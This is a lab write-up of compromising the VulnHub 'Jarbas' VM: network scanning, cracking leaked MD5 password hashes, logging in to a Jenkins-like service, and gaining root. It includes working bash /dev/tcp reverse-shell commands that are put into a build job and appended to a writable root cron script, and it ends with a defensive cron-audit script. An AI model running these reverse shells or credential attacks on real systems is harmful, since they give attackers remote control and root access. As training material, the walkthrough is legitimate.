Target (lab VM): https://www.vulnhub.com/entry/jarbas-1,232/
Information gathering
Host discovery
nmap -sn 192.168.18.142/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:32 CST
Nmap scan report for 192.168.18.1
Host is up (0.026s latency).
MAC Address: 30:AE:7B:E3:91:3F (Deqing Dusun Electron)
Nmap scan report for 192.168.18.123
Host is up (0.0020s latency).
MAC Address: 8C:AB:8E:7D:2C:F3 (Shanghai Feixun Communication)
Nmap scan report for LAPTOP-1DVA2N7.lan (192.168.18.197)
Host is up (0.00011s latency).
MAC Address: 40:74:E0:20:72:D1 (Intel Corporate)
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00034s latency).
MAC Address: 00:0C:29:1F:20:4E (VMware)
Nmap scan report for kali.lan (192.168.18.142)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.28 seconds
Port scan
┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 192.168.18.218
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:37 CST
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.000074s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
MAC Address: 00:0C:29:1F:20:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Port details and OS detection
========TCP
└─# nmap -sT -sV -O -p22,80,3306,8080 192.168.18.218
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:38 CST
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:1F:20:4E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.18 seconds
=======UDP
└─# nmap -sU -p22,80,3306,8080 192.168.18.218
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:43 CST
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00018s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
3306/udp closed mysql
8080/udp closed http-alt
MAC Address: 00:0C:29:1F:20:4E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
Script scan
└─# nmap --script=vuln -p22,80,3306,8080 192.168.18.218
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-15 13:40 CST
Nmap scan report for jarbas.lan (192.168.18.218)
Host is up (0.00025s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-trace: TRACE is enabled
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:1F:20:4E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 31.81 seconds
Vulnerability testing on ports 80 and 8080
First browse ports 80 and 8080 to see what they serve
Directory scanning
dirb scan
└─# dirb http://192.168.18.218
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Feb 15 13:50:33 2023
URL_BASE: http://192.168.18.218/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.18.218/ ----
+ http://192.168.18.218/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.18.218/index.html (CODE:200|SIZE:32808)
-----------------
END_TIME: Wed Feb 15 13:50:39 2023
DOWNLOADED: 4612 - FOUND: 2
Yujian (御剑) scan
"1","http://192.168.18.218/index.html","200"
"2","http://192.168.18.218/access.html","200"
"3","http://192.168.18.218/\.html","403"
Browsing the discovered pages, http://192.168.18.218/access.html turns out to be useful:
it lists what look like username and password-hash pairs:
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
Identify the hash type
hash-identifier 5978a63b4654c73c60fa24f836386d87
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
It is MD5.
Crack the hashes
5978a63b4654c73c60fa24f836386d87:italia99
9b38e2b1e8b12f426b0d208a7ab6cb98:vipsu
f463f63616cb3f1e81ce46b39f882fd5:marianna
tiago:italia99
trindade:vipsu
eder:marianna
Try logging in on port 8080
The usernames and passwords do not pair up as listed, so the combinations have to be tried against each other; the following combination works:
eder:vipsu
Insert a reverse shell into a build job
Create a new job
Create the new job and click OK
In the post-build actions, enter the reverse shell command
Enter the reverse shell and click Save
bash -i >& /dev/tcp/ip/port 0>&1
Keep an nc listener running on the attacker machine, then click Build
nc -lvvp 4444
listening on [any] 4444 ...
Look for useful information
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
(The other pane of the split terminal showed the attacker host's interfaces:)
2: eth0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc fq_codel state DOWN group default qlen 1000
    link/ether 00:0c:29:3e:ec:e7 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:3e:ec:fb brd ff:ff:ff:ff:ff:ff
    inet 192.168.18.142/24 brd 192.168.18.255 scope global dynamic noprefixroute eth1
       valid_lft 37169sec preferred_lft 37169sec
    inet6 fe80::20c:29ff:fe3e:ecfb/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
4: br-df3300895475: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:e8:f1:6e:2e brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-df3300895475
       valid_lft forever preferred_lft forever
Privileges are low, so move on to privilege escalation
Privilege escalation
Check the accounts
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$
The eder account exists; try reusing the cracked credentials over SSH
┌──(root㉿kali)-[~]
└─# ssh eder@219.168.18.218
ssh: connect to host 219.168.18.218 port 22: Connection timed out
Try escalating via a cron job
There is a cron job:
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
Append a reverse shell to the script the cron job runs
Start the listener before the job runs
└─# nc -lvvp 4442
listening on [any] 4442 ...
echo '/bin/bash -i >& /dev/tcp/192.168.18.142/4442 0>&1' >> /etc/script/CleaningScript.sh
Wait about five minutes for the job to fire
┌──(root㉿kali)-[~/Desktop/vulhub]
└─# nc -lvp 4442
listening on [any] 4442 ...
connect to [192.168.18.142] from jarbas.lan [192.168.18.218] 42608
bash: no job control in this shell
[root@jarbas ~]# sudo -l
sudo -l
Matching Defaults entries for root on jarbas:
!visiblepw, always_set_home, match_group_by_gid, env_reset,
env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User root may run the following commands on jarbas:
(ALL) ALL
[root@jarbas ~]#
The penetration test is complete at this point.
Summary
Notes on crontab
A low-privilege account normally cannot write cron jobs itself, but when a script that a high-privilege cron job already runs is writable by that account, a reverse shell can be appended to the script and executed with the job's privileges.
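As an added defender-side example (not part of this write-up), the following Python script parses /etc/crontab-format entries and flags root jobs whose script is owned by a non-root user or writable by group/other, which is exactly the weakness used above. The crontab text and the FAKE_FS permission table are constructed for an offline run; the function names are my own.

```python
import stat

# Constructed crontab text mirroring the entry found on the target.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# * * * * * user-name command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
0 2 * * * root /usr/local/bin/backup.sh
"""

# Constructed stand-in for the filesystem: path -> (owner uid, permission bits).
# The first entry models the misconfiguration on this box; the second is sane.
# On a live host pass a function such as
#   lambda p: (os.stat(p).st_uid, stat.S_IMODE(os.stat(p).st_mode))
FAKE_FS = {
    "/etc/script/CleaningScript.sh": (0, 0o777),
    "/usr/local/bin/backup.sh": (0, 0o755),
}

def parse_system_crontab(text):
    """Yield (user, command) from job lines of a system crontab (/etc/crontab format)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        fields = line.split(None, 6)  # min hour dom mon dow user command
        if len(fields) == 7:
            yield fields[5], fields[6]

def audit_crontab(text, stat_fn=FAKE_FS.get):
    """Return (user, script, reason) for root jobs whose script a non-root user could modify."""
    findings = []
    for user, command in parse_system_crontab(text):
        script = command.split()[0]  # the executable is the first token
        meta = stat_fn(script)
        if user != "root" or meta is None:
            continue
        uid, mode = meta
        if uid != 0:
            findings.append((user, script, f"owned by uid {uid}, not root"))
        elif mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((user, script, f"writable by group/other (mode {oct(mode)})"))
    return findings

if __name__ == "__main__":
    for user, script, reason in audit_crontab(SAMPLE_CRONTAB):
        print(f"[!] {user} job runs {script}: {reason}")
```

The check covers only the first token of each command; a script that in turn sources other writable files, or a PATH-relative command resolved through a writable directory, needs a deeper walk.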